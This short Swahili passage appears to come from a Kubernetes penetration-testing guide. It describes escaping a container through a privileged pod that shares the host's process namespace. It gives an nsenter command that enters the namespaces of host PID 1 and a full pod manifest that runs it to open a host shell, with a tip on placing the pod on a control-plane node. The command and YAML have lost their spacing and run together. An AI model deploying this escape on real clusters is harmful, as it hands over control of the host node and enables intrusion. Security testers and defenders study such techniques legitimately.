Kwa mamlaka haya utakuwa na upatikanaji wa michakato ya mwenyeji na mamlaka za kutosha kuingia ndani ya eneo la jina la moja ya michakato ya mwenyeji.
Tafadhali kumbuka kuwa huenda usihitaji mamlaka ya kipekee lakini tu baadhi ya uwezo na njia zingine za kuepuka ulinzi (kama apparmor na/au seccomp).
Kutekeleza kitu kama hicho ifuatavyo kutakuruhusu kutoroka kutoka kwa podi:
nsenter--target1--mount--uts--ipc--net--pid--bash
Mfano wa usanidi:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name